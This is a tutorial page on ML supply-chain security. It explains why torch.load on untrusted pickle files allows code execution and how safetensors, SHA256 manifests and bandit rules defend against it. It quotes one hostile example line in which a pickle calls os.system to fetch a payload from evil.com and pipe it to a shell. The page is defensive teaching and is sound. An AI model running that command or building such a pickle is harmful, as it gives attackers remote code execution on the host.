Skip to content

English · Español

02 — Supply chain: pickle, safetensors, MANIFEST.json

🇪🇸 La cadena de suministro es todo lo que cargamos desde disco — pesos del modelo, tokenizador, índices RAG. pickle es un intérprete Python serializado: torch.load(ruta_no_confiable) ejecuta código arbitrario por diseño. La alternativa es safetensors (solo datos, sin código) + un MANIFEST.json con SHA256 por artefacto, verificado por scripts/verify_artifacts.sh antes de cualquier carga.


What "supply chain" means for this system

Every persisted artifact loaded at runtime is part of the supply chain:

Artifact Path (per phases 11–32) Risk class
Tokenizer (BPE merges + vocab) artifacts/tokenizer/ Medium (JSON; integrity-only)
Model weights artifacts/checkpoints/mini-gpt-grammar.{pt,safetensors} High (deserialization)
RAG embeddings index artifacts/rag/index/ Medium (binary; integrity-only)
RAG knowledge-base chunks data/kb/grammar-rules/chunks.jsonl Medium (JSON; content-integrity)
Hypothesis fuzz corpus .hypothesis/ Low (test-time only)

The "supply chain" is the answer to: if I trust nothing about who put these files on disk, what can go wrong?

Pickle: the worst-case load

Python's pickle module is not a data format; it's a serialized program. When you call pickle.load(f), the pickle VM walks a sequence of opcodes that can:

  • Allocate objects.
  • Call arbitrary callables (including os.system, subprocess.run, eval).
  • Import arbitrary modules.

A pickle byte sequence that calls os.system("curl evil.com/payload | sh") during deserialization is trivial to construct. There is no flag to "load data only" — that's not what pickle does.

torch.load wraps pickle. So:

import torch
# Hostile checkpoint downloaded from a model hub:
state = torch.load("downloaded.pt")     # ← arbitrary code executes here
model.load_state_dict(state)            # ← reached only if RCE didn't drop a shell

The chance of RCE on torch.load(untrusted_path) is 100% if the file is hostile. Not "it depends on the model architecture." Not "if you have weird tensors." A hostile file is defined as one that runs code on load; the file format permits it; the loader honors it.

What "untrusted path" means

The path is untrusted if any of the following hold:

  • The file was downloaded from a public hub (Hugging Face, Civitai, a random GitHub release).
  • The file was emailed, dropped into a shared drive, or attached to a PR.
  • The file is on a host another user can write to without your review.
  • The file was downloaded a year ago; you don't remember verifying it.

Trust is a property of provenance and integrity, not of the act of having the file on disk.

Safetensors: data only, no code

safetensors is a format designed specifically to be safe to deserialize:

  • The header is a JSON object: tensor name → {dtype, shape, offsets}.
  • The body is raw bytes for each tensor, in the declared dtype/shape.
  • The loader never instantiates Python objects beyond plain tensors.

There is no opcode, no callable, no import, no __reduce__. The loader reads bytes into a tensor. End of trust boundary.

from safetensors.torch import load_file
state = load_file("downloaded.safetensors")   # just tensors, no code path to RCE

A hostile .safetensors file can still lie about its contents — wrong shape, wrong values, NaN-poisoned weights that degrade quality. That's an integrity attack, not an RCE. Caught downstream by:

  • Shape checks at load_state_dict.
  • MANIFEST.json SHA256 verification (below).
  • Behavioral tests after load (Phase 20's harness will flag a degraded model).

Trade: safetensors gives up the convenience of "pickle anything Python can pickle" and gains a hard guarantee against RCE-on-load.

MANIFEST.json: integrity for everything else

Even with safetensors, you still need to know: is this file the one I expect, or was it swapped?

Phase 18 emits MANIFEST.json at the end of each training run:

{
  "generated_at": "2026-05-22T14:31:08Z",
  "git_sha": "a1b2c3d…",
  "artifacts": [
    {
      "path": "artifacts/checkpoints/mini-gpt-grammar.safetensors",
      "sha256": "8f2a…cc91",
      "bytes": 4194304,
      "role": "model-weights"
    },
    {
      "path": "artifacts/tokenizer/vocab.json",
      "sha256": "1d3c…0a87",
      "bytes": 16384,
      "role": "tokenizer-vocab"
    },
    {
      "path": "data/kb/grammar-rules/chunks.jsonl",
      "sha256": "4e7b…b21f",
      "bytes": 102400,
      "role": "rag-kb"
    }
  ]
}

scripts/verify_artifacts.sh (Lab 04):

  1. Walks artifacts[].
  2. For each entry: computes sha256sum <path>.
  3. Compares to the stored sha256.
  4. Exits 0 if all match. Exits non-zero with a clear message naming the mismatched file.

This catches:

  • Bit rot on disk.
  • An attacker swapping chunks.jsonl for a poisoned version.
  • A teammate accidentally overwriting weights with an older checkpoint.

It does not catch:

  • An attacker who also rewrites MANIFEST.json. (Mitigation: GPG-sign MANIFEST.json, store the public key out-of-band. Phase 37's lab leaves signing as a stretch goal.)
  • Logic bugs in the artifacts. (Mitigation: behavioral tests, Phase 20.)

The manifest is a tripwire, not a fortress. But it's a cheap tripwire that catches the common cases (rot, accidental overwrite, naive tampering).

The threat in numbers

A quick sanity check, not a measurement:

  • Probability that a random hub checkpoint is hostile: low but non-zero. Documented incidents exist (PoisonGPT, public bandit-scanner findings on HF in 2023–2024).
  • Severity if a hostile checkpoint runs: 5/5 (full RCE on the host as the user running the load).
  • Detection probability without tooling: ~0% (nothing visible during load).
  • Detection probability with MANIFEST.json + safetensors-only policy: high for naive tampering, moderate for sophisticated tampering (the attacker would need to compromise both file and manifest and signing key if signed).

Residual risk after the policy: low for this single-user, local-only deployment. Higher for any multi-user deployment, which Phase 37 explicitly does not cover.

The enforcement: bandit + custom rule

The policy "no pickle-based loads in agent code" is enforced two ways:

  1. bandit rule B301 — flags pickle.load and friends in src/.
  2. Custom rule — flags torch.load( without an explicit weights_only=True argument. (Even with weights_only=True, prefer safetensors; the flag is a defense-in-depth, not the primary defense.)

just security runs both as part of CI. A new use of pickle requires a per-line # nosec with a justification comment, code review, and an entry in security/THREATS.md.

One-paragraph recap

The model-load path is the single highest-severity supply-chain risk in any ML system: torch.load on an untrusted pickle is RCE by design. The fix is two-layered: switch to safetensors (no code path to execute) and verify everything against MANIFEST.json SHA256 hashes (catch tampering and rot). Enforcement is via bandit + a custom rule, with scripts/verify_artifacts.sh as the runtime tripwire.

Next: theory/03-threat-modeling-numbers.md — the prob × severity × (1 − detection) matrix.